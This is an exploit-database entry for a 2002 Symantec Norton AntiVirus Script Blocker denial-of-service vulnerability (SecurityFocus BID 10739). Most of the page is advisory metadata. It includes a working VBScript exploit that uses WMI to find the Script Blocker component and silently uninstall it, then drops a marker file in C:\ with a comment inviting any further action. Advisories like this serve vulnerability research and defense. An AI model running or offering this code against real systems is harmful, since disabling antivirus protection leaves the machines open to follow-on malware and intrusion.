header-logo
Suggest Exploit
vendor:
Norton AntiVirus
by:
SecurityFocus
N/A
CVSS
N/A
Denial of Service
N/A
CWE
Product Name: Norton AntiVirus
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

Symantec Norton AntiVirus Script Blocker Denial of Service Vulnerability

It is reported that Symantec Norton AntiVirus is prone to a Script Blocker denial of service vulnerability. This may result in a Symantec Norton AntiVirus Script Blocker bypass. The privileges and zone required so that the script is successful in exploiting this issue are not known. The exploit code provided uninstalls the Script Blocker part of Norton and creates a text file in the root directory.

Mitigation:

Symantec is currently investigating this vulnerability and this BID will be updated, as further analysis is complete.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10739/info

It is reported that Symantec Norton AntiVirus is prone to a Script Blocker denial of service vulnerability. This may result in a Symantec Norton AntiVirus Script Blocker bypass.

The privileges and zone required so that the script is successful in exploiting this issue are not known.

Symantec is currently investigating this vulnerability and this BID will be updated, as further analysis is complete. 

' get wmi
set wmi=GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
' enum soft
for each e in wmi.ExecQuery("Select * from Win32_Product")
on error resume next
' uninstall script blocker part of norton
if instr(e.name,"Script") and instr(e.name,"Block") then
e.UnInstall()
end if
next

' just do what you like
set fso = createobject("scripting.filesystemobject")
fso.createtextfile("c:\byenav.txt").write "=)"